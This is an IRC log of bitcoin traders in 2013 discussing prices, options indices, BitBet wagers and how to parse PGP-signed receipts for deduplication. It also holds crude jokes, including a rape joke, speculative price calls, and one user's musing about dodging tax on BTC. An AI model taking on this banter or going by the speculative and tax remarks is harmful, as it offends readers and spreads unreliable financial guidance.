28 03:27:26 eh you guys are too bearish Feb 28 03:27:30 300k by next year Feb 28 03:27:36 XD Feb 28 03:27:40 collapse of the US dollar Feb 28 03:27:46 yeah Feb 28 03:27:53 Gold went up almost 100 dollars while bernanke spoke to congress Feb 28 03:28:01 ^- in other news Feb 28 03:28:01 so i btc will be like 5000 usd or 60 euros Feb 28 03:28:05 i = 1 Feb 28 03:28:43 QE infinity is going on so if the US goes into hyperinflation that could be plausible... Feb 28 03:30:02 wed be trillionairs Feb 28 03:30:46 and trillion dollars will by a stick of gum in that future :P Feb 28 03:30:54 ;;ticker --high Feb 28 03:30:55 33.00000 Feb 28 03:32:09 40 next week at this rate Feb 28 03:32:18 at this rate, today. Feb 28 03:32:48 ;;ticker --high Feb 28 03:32:49 33.20000 Feb 28 03:33:19 so many bears here Feb 28 03:36:32 the wall observer went nuts Feb 28 03:36:52 lol fuck Feb 28 03:36:58 I just fat finger failed Feb 28 03:37:03 I wonder if that dude who shoved a sharpie up his ass is happy Feb 28 03:37:20 dub? Feb 28 03:37:23 ;;ticker Feb 28 03:37:24 BTCUSD ticker | Best bid: 33.03123, Best ask: 33.08039, Bid-ask spread: 0.04916, Last trade: 33.08039, 24 hour volume: 62463.10960810, 24 hour low: 30.79010, 24 hour high: 33.20000, 24 hour vwap: 31.72613 Feb 28 03:37:37 the economy is growing... Feb 28 03:38:17 kakobreklaa: I 32'd when I should have 33'd Feb 28 03:38:19 so funny Feb 28 03:38:21 ;;seen smickles Feb 28 03:38:22 smickles was last seen in #bitcoin-assets 2 weeks, 4 days, 23 hours, 27 minutes, and 41 seconds ago: pong Feb 28 03:38:37 where for art thou smickles Feb 28 03:38:40 I bot all my gox cash 3 hours ago cause I though it was going to rocket Feb 28 03:38:48 sketched out Feb 28 03:38:56 sold all 20 minutes later Feb 28 03:39:01 now rebought at 32.90 Feb 28 03:39:08 fucking retarded Feb 28 03:39:11 :D Feb 28 03:39:12 I feel tainted... by trading... Feb 28 03:39:19 raped its called. Feb 28 03:39:34 No... I'd be the one raping... Feb 28 03:39:36 bug.. what happened to your btc short Feb 28 03:39:55 Tainted is the word. Feb 28 03:41:03 oh I closed that Feb 28 03:41:07 long time ago Feb 28 03:41:24 waited till the 24hprc started going up Feb 28 03:41:28 ate the loss Feb 28 03:41:31 sucked Feb 28 03:41:50 not shorting this rally again Feb 28 03:42:35 when you don't short it is when you get screwed Feb 28 03:42:40 but when you do, you also get screwed Feb 28 03:42:47 just learn to accept the unconditional screwage Feb 28 03:42:48 so do the oposite Feb 28 03:42:52 go long. Feb 28 03:43:41 win some lose some Feb 28 03:43:46 btc is dangerous to short Feb 28 03:43:56 I wanted to short LTC no one took me on my offer lol Feb 28 03:48:33 we broke the high and i was sleeping??? Feb 28 03:48:43 fuuuuuuuuuuuuuuuuuuuuuu Feb 28 03:48:44 go back to sleep then Feb 28 03:49:14 Go dream for a while, come back when they're 500 USD/BTC or something Feb 28 03:49:34 yeah im back to bed Feb 28 03:49:39 bufgr' Feb 28 03:49:44 night+ Feb 28 03:51:50 wow, nice bid walls, and no real ask walls Feb 28 03:53:08 yeah Feb 28 03:59:37 i hope someone isn't hoarding Feb 28 03:59:50 Bugpowdr lol mtgox is grateful Feb 28 03:59:53 it'll go up to like 40 and some whale will begin dumping Feb 28 04:01:00 yah but now i havemoar Feb 28 04:02:43 Woooooooooooooooooooow Feb 28 04:03:15 WTF is going on Feb 28 04:03:24 ;;ticker Feb 28 04:03:26 BTCUSD ticker | Best bid: 32.91578, Best ask: 33.05300, Bid-ask spread: 0.13722, Last trade: 33.05300, 24 hour volume: 63289.54985978, 24 hour low: 30.79010, 24 hour high: 33.20000, 24 hour vwap: 31.75887 Feb 28 04:03:30 this is kinda funnay. Feb 28 04:03:40 31.25261933 is price implied by options Feb 28 04:04:12 how'd you come up with that number so fast Feb 28 04:04:24 [BTCTC] [BTC-BOND] 439 @ 0.01 = 4.39 BTC [+] Feb 28 04:04:55 cause of maffs Feb 28 04:05:17 are you taking total volume of each option? Feb 28 04:05:35 I'm still surprised at getting so much BTC loaned to me considering the interest I offer. Feb 28 04:05:35 [BTCTC] [BTC-BOND] 235 @ 0.01 = 2.35 BTC [+] Feb 28 04:05:39 i wonder if we will see a bubble to $200 or something Feb 28 04:06:53 mircea_popescu: I got 31.653 Feb 28 04:13:10 http://mpex.co/ Feb 28 04:13:17 mpex now publishes 7day oix number Feb 28 04:20:00 cool Feb 28 04:21:30 god damn it Feb 28 04:22:56 ;;ticker Feb 28 04:22:56 BTCUSD ticker | Best bid: 31.93788, Best ask: 32.00000, Bid-ask spread: 0.06212, Last trade: 32.00000, 24 hour volume: 76977.68308630, 24 hour low: 30.79010, 24 hour high: 33.20000, 24 hour vwap: 31.89740 Feb 28 04:26:50 bugpowder: what? Feb 28 04:29:08 the twin towers fell Feb 28 04:29:31 I am so bad at day trading Feb 28 04:31:21 manipulator action going on... Feb 28 04:31:37 I saw the walls form regular steps or changing place all the time Feb 28 04:32:45 Nah dude. The got eaten Feb 28 04:32:53 look at the volume Feb 28 04:32:59 ah, okay Feb 28 04:33:04 I avoid daytrading Feb 28 04:33:31 rally is back on Feb 28 04:33:35 I'm short bitcoin Feb 28 04:33:43 duuuude Feb 28 04:33:58 at what price do you blow up? Feb 28 04:34:04 mtgoxlive.com fails for me, is there a better site like it? Feb 28 04:34:49 i placed a sell order for 10% of my btc at $200 Feb 28 04:34:58 www.example.com Feb 28 04:35:06 It's the same but loads faster. Feb 28 04:35:13 Shows you nothing Feb 28 04:35:17 ;;lag Feb 28 04:35:18 Error: "lag" is not a valid command. Feb 28 04:35:20 clarkmoody Feb 28 04:35:24 for trades Feb 28 04:35:26 ;;goxlag Feb 28 04:35:27 0.204543 seconds Feb 28 04:35:32 http://bitcoincharts.com/charts/mtgoxUSD/accumulated_orderbook.png Feb 28 04:35:36 for walls Feb 28 04:35:42 zoom in on the pic Feb 28 04:35:43 ;;goatlag Feb 28 04:35:43 Error: "goatlag" is not a valid command. Feb 28 04:36:21 I think we are going to 50 now Feb 28 04:38:52 prolly not far off Feb 28 04:38:53 http://btctrading.wordpress.com/2013/02/16/short-term-update-mtgox-daily-chart-13/ Feb 28 04:39:20 and this is old. Feb 28 04:39:59 [BTCTC] [GSDPT] 1 @ 0.00629 BTC [-] Feb 28 04:40:02 [BTCTC] [GSDPT] 4 @ 0.00629 = 0.0252 BTC [-] Feb 28 04:40:07 [BTCTC] [GSDPT] 1000 @ 0.0063 = 6.3 BTC [+] Feb 28 04:40:47 usagis silver at 29. Feb 28 04:42:18 he is selling half ounces at 1.3BTC though, much cheaper than anywhere else. Feb 28 04:42:22 [BTCTC] [GSDPT] 454 @ 0.00636 = 2.8874 BTC [+] Feb 28 04:42:24 [BTCTC] [GSDPT] 3 @ 0.00639 = 0.0192 BTC [+] Feb 28 04:42:27 [BTCTC] [GSDPT] 10039 @ 0.0064 = 64.2496 BTC [+] Feb 28 04:42:29 [BTCTC] [GSDPT] 10 @ 0.0064 = 0.064 BTC [+] Feb 28 04:42:45 whoa Feb 28 04:42:52 thats big for BTCTC Feb 28 04:43:26 what? No Feb 28 04:43:42 BTCTC has about 2.3k 30d volume right now Feb 28 04:44:05 Done mostly on higher day. Feb 28 04:44:18 With dead periods in-between Feb 28 04:46:13 http://trilema.com/2013/introducing-the-oix/ Feb 28 04:48:36 mhm Feb 28 04:48:41 ;;ticker Feb 28 04:48:41 BTCUSD ticker | Best bid: 32.45988, Best ask: 32.58915, Bid-ask spread: 0.12927, Last trade: 32.45988, 24 hour volume: 79609.88962262, 24 hour low: 30.79010, 24 hour high: 33.20000, 24 hour vwap: 31.91584 Feb 28 04:48:48 32.45.. down from 33 Feb 28 04:48:50 CRASH!!! Feb 28 04:53:01 it hit 31.40 taking out 15,000 BTC on the way Feb 28 04:54:36 [MPEX] [O.BTCUSD.C510T] 20 @ 0.0915995 = 1.832 BTC Feb 28 04:56:54 i have a confession.. i actually dont know how to mine bitcoins Feb 28 04:57:01 yet i jumped on the avalon bandwagon Feb 28 04:57:02 lol Feb 28 04:57:39 #bitcoin-church Feb 28 05:02:01 ;;ticker Feb 28 05:02:02 BTCUSD ticker | Best bid: 32.60001, Best ask: 32.60490, Bid-ask spread: 0.00489, Last trade: 32.60490, 24 hour volume: 80058.57461354, 24 hour low: 30.79010, 24 hour high: 33.20000, 24 hour vwap: 31.92017 Feb 28 05:03:13 [MPEX] [O.BTCUSD.C310T] 4 @ 0.26985946 = 1.0794 BTC [+] Feb 28 05:03:21 The buy must have been triggered by the are technia article Feb 28 05:03:29 !ticker s.bbet Feb 28 05:03:30 I prepared your canoe with cedar boughs. Feb 28 05:03:30 God DAMN it Feb 28 05:03:36 !ticker m s.bbet Feb 28 05:03:38 [MPEX:S.BBET] 1D: 0.00196499 / 0.00196499 / 0.00196499 (298 shares, 0.59 BTC), 7D: 0.00196487 / 0.00196488 / 0.001965 (3303 shares, 6.49 BTC), 30D: 0.0003 / 0.00147341 / 0.001965 (77565 shares, 114.29 BTC) Feb 28 05:03:42 I had advanced knowledge and I fucked it up. Feb 28 05:04:22 Let's just get up to 50 so I can forget about this troubled time in my life. Feb 28 05:05:09 techbia artical? Feb 28 05:05:23 Bugpowdr i really don't think it was any article. Feb 28 05:05:32 it was the coinlab news Feb 28 05:06:01 people understand what easier US market access will do to the price. Feb 28 05:06:04 the one about coinlab helping instatutional investers was pretty damn bullish Feb 28 05:06:07 Fucking firepower Feb 28 05:06:09 ah Feb 28 05:06:12 $100 Feb 28 05:06:17 is gonna happen Feb 28 05:06:25 yeah, i wonder if people knew about that and they bought it all up Feb 28 05:06:36 THat's why I bought back Feb 28 05:06:55 i never sold, have a sell over for 10% at $200 Feb 28 05:08:18 im gonna redesign bitbet when 100 happens Feb 28 05:08:39 eh Feb 28 05:08:43 just hold it and forget it Feb 28 05:08:47 simplest strategy Feb 28 05:09:05 [BTCTC] [BTC-BOND] 50 @ 0.01 = 0.5 BTC [+] Feb 28 05:09:13 had you forgotten about btc in 2011 Feb 28 05:09:21 and checked it in 2013, ud go.. yawn Feb 28 05:09:21 and if everybody does that, few years from now not a single node will be runing Feb 28 05:09:25 everyone forgot. Feb 28 05:09:28 lol Feb 28 05:09:39 well, its a dillema Feb 28 05:09:51 ill be mining soon so i wont forget Feb 28 05:09:58 ill ride this horse wherever it takes me Feb 28 05:10:32 Chaang-Noi you never sold what exactly ? whatever was left after paying out for the TYGRR.BOND (100% Insured Pirate Bonds) Feb 28 05:15:03 [MPEX] [O.BTCUSD.C350T] 5 @ 0.21653437 = 1.0827 BTC [+] Feb 28 05:17:49 [BTCTC] [BASIC-MINING] 9 @ 0.35 = 3.15 BTC [+] Feb 28 05:32:34 mircea_popescu i did pay that out in full Feb 28 05:34:09 is the s.dice dividend still 14K? Feb 28 05:35:20 [BTCTC] [PAJKA.BOND] 4 @ 0.1 = 0.4 BTC [+] Feb 28 05:35:37 ~13 Feb 28 05:36:25 thanks Feb 28 05:38:04 could it be the buy was a panic buy Feb 28 05:38:07 because coinlab.. Feb 28 05:38:20 will bring customers closer to IRS Feb 28 05:38:41 yes I considered that as well Feb 28 05:38:48 yeah good work coinlab Feb 28 05:38:48 buy with cash on hand Feb 28 05:38:51 n00bs Feb 28 05:38:53 yeah Feb 28 05:38:54 then get the coins out Feb 28 05:38:58 bring wallstreet to bitcoin Feb 28 05:39:00 that makes sense Feb 28 05:39:01 good work n0000bs Feb 28 05:39:13 .. i wont ever touch coinlab with a ten foot pole Feb 28 05:39:17 that sicky Feb 28 05:39:17 The cash for that buy was proablbly already in there Feb 28 05:39:24 same Feb 28 05:39:28 so, my mtgox purchase 6 months ago is on the IRS books now? Feb 28 05:39:29 who knows, maybe they will do a good job Feb 28 05:39:36 nah Feb 28 05:39:39 aiball is it retroactive? Feb 28 05:39:39 nah Feb 28 05:39:39 nah Feb 28 05:39:41 [MPEX] [S.MPOE] 2457 @ 0.00074124 = 1.8212 BTC [-] Feb 28 05:39:43 [MPEX] [S.MPOE] 10000 @ 0.00074124 = 7.4124 BTC [-] Feb 28 05:39:44 it will be if you use coinlab Feb 28 05:39:46 unless you are 50k Feb 28 05:39:48 they'll be the first to get slaughted Feb 28 05:39:54 $50k+ Feb 28 05:39:59 [MPEX] [S.MPOE] 618 @ 0.00073982 = 0.4572 BTC [-] Feb 28 05:40:06 will be the first to be examined Feb 28 05:40:09 then $10k+ Feb 28 05:40:16 we're talking about taxes here Feb 28 05:40:18 FACTA violators Feb 28 05:40:18 its game over Feb 28 05:40:21 etc Feb 28 05:40:27 if BTC gets high enough, the govt might actually dig through 100 dollar buys Feb 28 05:40:32 and hunt those people Feb 28 05:40:34 aethero I was asking your question Feb 28 05:40:38 i doubt it Feb 28 05:40:44 just report it Feb 28 05:40:59 buys don't matter anyway Feb 28 05:40:59 [HAVELOCK] [SDICE] 1 @ 0.6795 BTC [-] Feb 28 05:41:04 sales matter Feb 28 05:41:35 unless they really are treating BTC as a foreign currency that is to be market to market at year end Feb 28 05:42:12 If you want BTC to hit $1000, there are some things that are gonna have to happen first Feb 28 05:43:10 $1000 should be in 3 years or maybe more, lots of time Feb 28 05:43:37 what is better on linux a i3 2130 or an amd 955? Feb 28 05:43:46 most for doing btc stuff Feb 28 05:43:48 Bugpowder I agree, Like Butch and Sundance didn't need to keep watch until they had the payroll Feb 28 05:56:58 [HAVELOCK] [SDICE] 6 @ 0.6795 = 4.077 BTC [-] Feb 28 06:03:47 [BTCTC] [COGNITIVE] 1 @ 0.278 BTC [-] Feb 28 06:03:49 [BTCTC] [COGNITIVE] 2 @ 0.2701 = 0.5402 BTC [-] Feb 28 06:04:14 [BTCTC] [COGNITIVE] 7 @ 0.27 = 1.89 BTC [-] Feb 28 06:05:47 mhm.. i wonder if this is allowed Feb 28 06:06:04 i just cash in enough BTC to hit the limit of a poor person Feb 28 06:06:09 so i wont have to pay income tas Feb 28 06:06:10 x Feb 28 06:06:23 but i have enough BTC worth hundreds of thousands of dollars Feb 28 06:06:26 is that legit? Feb 28 06:07:10 If your BTC has appreciated in value, I think you don't need to declare that value increase until you sell them. So yes. But speak to an accountant. Feb 28 06:08:04 It's like when you have income. You pay your taxes, then let's say you buy stocks. If they raise in value, you don't pay taxes on that until you sell, at which point the price difference becomes capital gains. Feb 28 06:08:36 IRS going back thru records is kinda pointless Feb 28 06:08:36 Laws & regulations vary by country/state tho Feb 28 06:08:44 no way for them to know how much btc you have Feb 28 06:09:04 they'd only care about coins sold Feb 28 06:09:26 income Feb 28 06:09:38 Probably that too. Feb 28 06:10:57 i can sell around 13k Feb 28 06:11:02 and wont have to work for the whole year Feb 28 06:11:07 then i dont pay taxes Feb 28 06:11:09 lol Feb 28 06:11:16 but what if i use btc directly Feb 28 06:11:18 they wont know Feb 28 06:11:37 They might not but that's supposed to be declared. Feb 28 06:12:42 The interesting thing is stock brokers here retain the tax as soon as you sell. Feb 28 06:12:53 Not the end of the year, or the month or anything. Immediately. Feb 28 06:13:40 Oh, they also report some stuff you still owe to the man. Feb 28 06:14:59 [HAVELOCK] [KCIM] 2 @ 0.99 = 1.98 BTC [-] Feb 28 06:15:08 hey mircea_popescu you there? still working on this auto-push-receipt processing... Feb 28 06:15:20 topace_ ya ? Feb 28 06:15:50 i cant just hash the receipt to get a unique id because then doing something as simple as changing the comment in th e sig would change the hash and stilll validate Feb 28 06:16:22 change the comment in what sig ? Feb 28 06:16:35 Version: GnuPG v1.4.5 (GNU/Linux) Feb 28 06:16:47 i can change that line on the receipt and it still validates Feb 28 06:17:05 [MPEX] [S.MPOE] 6214 @ 0.00074829 = 4.6499 BTC [+] Feb 28 06:17:07 [MPEX] [S.MPOE] 6600 @ 0.0007522 = 4.9645 BTC [+] Feb 28 06:17:21 [MPEX] [S.MPOE] 6935 @ 0.00075379 = 5.2275 BTC [+] Feb 28 06:17:23 but you hash the signed part not the headers Feb 28 06:17:24 and if i try to just grab the actual signature hash, that can still be changed adn still validate Feb 28 06:17:36 how ? Feb 28 06:17:45 iD8DBQFRJRZakhT8a/G2mSERAtfRAJ9LBtdI5x2a7WwNqZMTLLoaWV/rFACfRvtQ Feb 28 06:17:45 n9TB69az5+U9gPxX7BRkrgg= Feb 28 06:17:45 =DWpV Feb 28 06:17:56 is the signature on this receipt Feb 28 06:17:58 ok Feb 28 06:18:05 if i add a 1 to teh end of it, it still validates Feb 28 06:18:09 =DWpV1 Feb 28 06:18:11 as the last line Feb 28 06:18:19 uhm Feb 28 06:18:34 it validates with a broken checksum ?! Feb 28 06:18:37 brb i gotta check this Feb 28 06:18:45 i can actually add anything concatenated to the end Feb 28 06:18:47 and it still validates Feb 28 06:19:06 iD8DBQFRJRZakhT8a/G2mSERAtfRAJ9LBtdI5x2a7WwNqZMTLLoaWV/rFACfRvtQ Feb 28 06:19:06 n9TB69az5+U9gPxX7BRkrgg= Feb 28 06:19:06 =DWpVadsfasdfasdfasdfasdfasdfasdfasdfasdf Feb 28 06:19:07 -----END PGP SIGNATURE----- Feb 28 06:19:11 validates too Feb 28 06:20:24 wait. Feb 28 06:21:16 none of this is actually a problem Feb 28 06:21:51 the last line is always a =xyzk 4 characters checksum of the foregoing Feb 28 06:22:02 if the checksum is broken it doesn't actually validate Feb 28 06:22:12 if more shit is added at the end that doesn't actually matter. Feb 28 06:22:58 ahh, so I should only be considering the 2 lines of the signature hash? Feb 28 06:23:02 is it always 2 lines? Feb 28 06:23:07 (with a 3rd as checksum?) Feb 28 06:23:35 hmm nope, i can concatenate the two lines into one and it validates.. i can combine all 3 lines onto one, and it validates too... Feb 28 06:23:37 the structure of a gpg signed message is, there's a header (begin blabla, comment whatever), then a message, then a signature ehader, then the signature Feb 28 06:23:44 which may be however long, mine are usually 6 lines Feb 28 06:23:50 and then a 1 line checksum as a =4char Feb 28 06:23:55 and then a close Feb 28 06:25:12 does the = at the end of the sig (before the checksum) designate the end of the signature? Feb 28 06:25:23 no, that's base64 filler Feb 28 06:25:29 you can have 0, 1 or 2 Feb 28 06:26:25 so how can i reliably filter out just the signature? if there's no logical separator? Feb 28 06:26:29 the gpg parser mostly ignores spaces/newlines/etc EXCEPT it wants a newline after the begin sig tag Feb 28 06:27:23 all on one line: iD8DBQFRJRZakhT8a/G2mSERAtfRAJ9LBtdI5x2a7WwNqZMTLLoaWV/rFACfRvtQn9TB69az5+U9gPxX7BRkrgg==DWpV Feb 28 06:27:25 validates too Feb 28 06:27:50 put it on the same line with -----BEGIN PGP SIGNATURE----- Feb 28 06:28:05 so if there can be crap after the end, how do i know where to stop reading characters that are actually part of the signature Feb 28 06:28:48 yea it definitely needs a blank line after the BEGIN PGP SIGNATURE line Feb 28 06:28:52 yes. Feb 28 06:29:33 within the signature block, a =j61e type string is the end (cause it's the checksum) Feb 28 06:29:39 but if there's no way of knowing how long the signature is expected to be, and it allows adding crap at the end, again, how do i know where to stop reading the characters of the 'actual' signature Feb 28 06:29:53 cause when you reach the checksum it's ended Feb 28 06:30:27 but how can you be sure you've reached the checksum? Feb 28 06:30:43 because it's a 5 char string starting with = Feb 28 06:31:00 (the = char may not be part of the signature cause it's not in the base64 list) Feb 28 06:31:16 ;;ticker Feb 28 06:31:20 BTCUSD ticker | Best bid: 32.14001, Best ask: 32.35299, Bid-ask spread: 0.21298, Last trade: 32.35599, 24 hour volume: 81740.26344155, 24 hour low: 30.79010, 24 hour high: 33.20000, 24 hour vwap: 31.94954 Feb 28 06:32:19 so i'd also have to trim off the = before the =4chr Feb 28 06:32:25 because it can be there or not and it still validates Feb 28 06:32:29 iD8DBQFRJRZakhT8a/G2mSERAtfRAJ9LBtdI5x2a7WwNqZMTLLoaWV/rFACfRvtQn9TB69az5+U9gPxX7BRkrgg==DWpV Feb 28 06:32:31 iD8DBQFRJRZakhT8a/G2mSERAtfRAJ9LBtdI5x2a7WwNqZMTLLoaWV/rFACfRvtQn9TB69az5+U9gPxX7BRkrgg=DWpV Feb 28 06:32:34 both validate Feb 28 06:32:53 as does Feb 28 06:32:57 iD8DBQFRJRZakhT8a/G2mSERAtfRAJ9LBtdI5x2a7WwNqZMTLLoaWV/rFACfRvtQn9TB69az5+U9gPxX7BRkrgg==========DWpV Feb 28 06:33:06 yes, because = is padding in base64 Feb 28 06:34:03 [BTCTC] [BASIC-MINING] 13 @ 0.35 = 4.55 BTC [+] Feb 28 06:34:04 =*\w{4} would be the regex Feb 28 06:34:42 okay, so im just doing /\n([A-Z0-9]+)/ ? Feb 28 06:34:53 then using that as my unique identifier to ensure i never double-process the same receipt? Feb 28 06:34:58 well no. Feb 28 06:36:50 basically, here's what you do : Feb 28 06:37:51 1. you look for -----BEGIN PGP SIGNED MESSAGE-----. if not found, kill the task. if found : Feb 28 06:38:14 2. you wipe the first line after it no matter what it contains, and as many empty lines only after that Feb 28 06:38:32 3. you look for the -----BEGIN PGP SIGNATURE----- tag. Feb 28 06:38:38 4. you wipe the first line after it no matter what it contains, and as many empty lines only after that Feb 28 06:38:58 5. you look for an = and wipe everything from that point forward (including it) Feb 28 06:39:50 6. you wipe all space/newline in your string Feb 28 06:39:56 7. i hope i've not forgotten anything Feb 28 06:40:32 yea.. okay that makes sense.. Feb 28 06:40:55 so i end up with just iD8DBQFRJRZakhT8a/G2mSERAtfRAJ9LBtdI5x2a7WwNqZMTLLoaWV/rFACfRvtQn9TB69az5+U9gPxX7BRkrgg Feb 28 06:41:13 right. Feb 28 06:41:23 is mpex signature seriously that short ?! Feb 28 06:41:32 heh ya Feb 28 06:41:38 no wonder im changing it. Feb 28 06:41:43 on the push receipt im using as a sample at least Feb 28 06:42:24 then i should still take a hash of the signature, and use the hash as my unique identifier? Feb 28 06:43:07 well, i guess you can use the signature only. Feb 28 06:43:20 tho i'd imagine a whole message digest works too Feb 28 06:44:32 interesting, this signature stuff Feb 28 06:45:01 if you sign the same thing multiple times, the signature will always be different though, right? Feb 28 06:45:38 if i was going to do a digest of the whole message, i'd have to do it based on a post-processed data (removing the comments and the blank lines, etc) Feb 28 06:46:17 if you sign the same thing multiple times the sig will be different yes Feb 28 06:46:23 becuase one stray \n would cause a different digest for the same receipt Feb 28 06:47:21 okay excellent, i think that gives me enough to get this implemented tomorrow.. bedtime now! thanks for your help! Feb 28 06:47:26 as long as you wipe the comment lines Feb 28 06:47:54 (one after begin message tag, one after begin signature tag) and non-base64 chars you should be ok. Feb 28 06:47:57 oo actually gnupg_verify() will return the plaintext portion of hte message for me (but not the signature portion) Feb 28 06:48:13 i think it returns the sig digest too Feb 28 06:48:40 nope.. just the fingerprint Feb 28 06:51:16 BFL wired chip: https://forums.butterflylabs.com/dbtgallery.php?do=gallery_image&id=596&gal=gallery&type=full Feb 28 06:51:16 im out.. g'nite! Feb 28 06:53:29 ThickAsThieves that looks ready for delivery Feb 28 06:54:23 OIX looks nice... lol, good it wasn't around last weekend when i did my assorted next month calls shopping Feb 28 06:55:10 they had breakeven around 50 :D Feb 28 06:57:24 in other news, a new jimi hendrix album Feb 28 06:57:28 heh Feb 28 06:57:39 sounds pretty good too, if you like jimi Feb 28 07:02:00 mircea_popescu i see my coinlab bet proposal being refunded, why? Feb 28 07:02:16 mmm no idea Feb 28 07:02:52 or it was just already paid out? lol Feb 28 07:02:53 kako no like Feb 28 07:03:04 um. link ? or be speciffic. Feb 28 07:04:11 i'll try to reconstruct it from memory: CoinLab will close or cease bitcoin payments by end of this year Feb 28 07:04:47 bet will resolve as YEs when coinlab.com will be unavailable through 7 days straight, too. Feb 28 07:04:53 ^ that Feb 28 07:09:54 what time did you put it in ? Feb 28 07:11:10 [21:52:28 CET] what do you think about bet: CoinLab will close or cease bitcoin payments by June ? Feb 28 07:11:31 i did it awhile after that Feb 28 07:12:31 ah ok Feb 28 07:12:34 looking into this Feb 28 07:13:07 i suspect i may have mixed coinbase/coinlab.. Feb 28 07:13:57 maybe after a while i get so confused so i'll mention coinbr along with them it and havoc ensues :D Feb 28 07:14:06 lmao Feb 28 07:21:46 [BTCTC] [S.MPOE-PT] 8970 @ 0.0007 = 6.279 BTC [-] Feb 28 07:21:49 [BTCTC] [S.MPOE-PT] 8615 @ 0.0007 = 6.0305 BTC [-] Feb 28 07:27:15 http://arstechnica.com/tech-policy/2013/02/in-bid-for-credibility-largest-bitcoin-exchange-moves-to-silicon-valley/ Feb 28 07:27:38 ars managed to put a foot into their mouth as well Feb 28 07:28:09 almost as if coinlab bought mtgox Feb 28 07:29:08 And placing the exchange's funds within US jurisdiction will make it harder for the firm to disappear with customers' cash. Feb 28 07:29:18 ftw Feb 28 07:30:37 jurov are you already or still up this morning Feb 28 07:30:52 ThickAsThieves: where did you get it? Feb 28 07:30:56 still up, unfortunately Feb 28 07:31:23 aha so its you, mircea and me, the three fucked yuropean Feb 28 07:31:32 or am i missing someone Feb 28 07:31:39 yuropeans* Feb 28 07:31:47 yup Feb 28 07:32:22 http://trilema.com/2013/introducing-the-oix/ Feb 28 07:32:27 updated with a historical oix graph Feb 28 07:32:29 which is kinda cool Feb 28 07:34:03 toffoo, where did i get what Feb 28 07:34:09 hate to nitpick, but 10 decimal places? two are sufficient for such index Feb 28 07:34:39 (unless btc falls below 1, ofc) Feb 28 07:34:43 jurov no, 10 decimals!!1 Feb 28 07:34:47 satoshicents Feb 28 07:35:07 yeah that is ridiculus. Feb 28 07:35:37 at least make it 8 Feb 28 07:35:45 i stand corrected. i can now imagine the hysteria on #assets "crash!! oix down 0.5 satoshi!!" Feb 28 07:36:01 teh end of the werlds Feb 28 07:36:06 as soon as bowjob learns about it Feb 28 07:36:16 ThickAsThieves: your new hendrix album Feb 28 07:36:20 but srsly, i envisage this being used as a replacement for satoshi dice random number generator Feb 28 07:37:14 not sure if serious Feb 28 07:37:34 http://bitbet.us/bet/265/bfl-will-deliver-asic-devices-before-april-1st/ Feb 28 07:37:40 this is getting hot-er Feb 28 07:39:14 lol at leet bet Feb 28 07:40:03 http://www.npr.org/2013/02/27/172992228/first-listen-jimi-hendrix-people-hell-and-angels?sc=fb&cc=fmp Feb 28 07:40:19 BFL_Josh Feb 28 07:40:19 Chips almost bumped, shipping on week of 4 - or 11 at the latest Feb 28 07:40:21 what, srsly ? Feb 28 07:40:23 let the trolls descend http://trilema.com/2013/introducing-the-oix/ Feb 28 07:40:34 http://www.reddit.com/r/Bitcoin/comments/19dqcd/mpoe_introduced_bitcoin_price_sentiment_indicator/ Feb 28 07:40:39 ^ i meant this Feb 28 07:40:43 a ok Feb 28 07:41:21 yup it used the graph as thumbnail Feb 28 07:52:05 [BTCTC] [S.MPOE-PT] 5 @ 0.00072 = 0.0036 BTC [+] Feb 28 07:56:02 [BTCTC] [S.DICE-PT] 150 @ 0.00643 = 0.9645 BTC [-] Feb 28 07:56:09 http://mpex.co/ Feb 28 07:56:30 improved by user request Feb 28 07:57:00 cool! Feb 28 08:01:48 in the parentheses are next month/this month? Feb 28 08:03:21 but then, 23.73 seems too low Feb 28 08:03:51 no it's calls / puts Feb 28 08:07:46 good mornin Chaang-Noi Feb 28 08:07:53 tanking nao Feb 28 08:09:30 we'll see when americans "wake up to" it Feb 28 08:09:36 ;;ticker Feb 28 08:09:36 BTCUSD ticker | Best bid: 32.10207, Best ask: 32.26999, Bid-ask spread: 0.16792, Last trade: 32.26999, 24 hour volume: 83302.39912401, 24 hour low: 30.79010, 24 hour high: 33.20000, 24 hour vwap: 31.96821 Feb 28 08:09:56 well i was trying to be funny Feb 28 08:09:59 is all Feb 28 08:10:26 since sleeping goats have positive effects of crypto currencies price Feb 28 08:13:14 what we do with goats when they wake up? Feb 28 08:13:19 we milk them! Feb 28 08:13:29 i thought we sacrifice them Feb 28 08:13:34 for gods n stuff Feb 28 08:13:34 lmao Feb 28 08:13:46 but yeah, get the milk first Feb 28 08:13:53 no point in waisting that. Feb 28 08:14:11 ;;google goatfucker Feb 28 08:14:12 Urban Dictionary: goatfucker: ; The Goat Fucker | Facebook: ; Goatfucker.com | Fucking everything, one goat at a time!: Feb 28 08:14:37 ungulates only produce milk if they're pregnant you know. Feb 28 08:16:37 hm, i milked goats late in summer myself... and i know they give milk for whole year Feb 28 08:17:38 dunno about fucking. was never so desperate. Feb 28 08:18:24 http://bitbet.us/bet/265/bfl-will-deliver-asic-devices-before-april-1st/#c218 Feb 28 08:18:28 7.4 : 6.19 Feb 28 08:22:19 [BTCTC] [S.MPOE-PT] 1 @ 0.00072 BTC [+] **** BEGIN LOGGING AT Thu Feb 28 17:59:08 2013 Feb 28 17:59:42 ;;ticker Feb 28 17:59:42 BTCUSD ticker | Best bid: 33.60110, Best ask: 33.60111, Bid-ask spread: 0.00001, Last trade: 33.60111, 24 hour volume: 94092.99709452, 24 hour low: 30.90120, 24 hour high: 33.83941, 24 hour vwap: 32.37123 Feb 28 17:59:51 le wow. Feb 28 18:04:50 she bangs Feb 28 18:05:12 this month is already 10% up it hasn't even started. Feb 28 18:06:55 http://en.wikipedia.org/wiki/She_Bangs Feb 28 18:07:03 what do you know, retardopedia has a 5000 word entry on the topic. Feb 28 18:07:35 haha, here's the original vid quite the laugh: http://youtu.be/0d5eP0wWLQY Feb 28 18:08:57 i remember teenybopers were crazy about it not so long ago. Feb 28 18:09:03 i remember watching that on tv like omg SHE BANGS! this kid is on turbo mode. Feb 28 18:09:54 epic fails are epic Feb 28 18:10:05 ;ticker Feb 28 18:10:09 ;;ticker Feb 28 18:10:10 BTCUSD ticker | Best bid: 33.66888, Best ask: 33.88997, Bid-ask spread: 0.22109, Last trade: 33.66888, 24 hour volume: 95511.46006840, 24 hour low: 30.90120, 24 hour high: 33.89000, 24 hour vwap: 32.39862 Feb 28 18:10:17 so bfl delivered yet ? Feb 28 18:11:20 http://bitbet.us/bet/265/bfl-will-deliver-asic-devices-before-april-1st/ lol 11:7 against for april. mmmmkay Feb 28 18:11:36 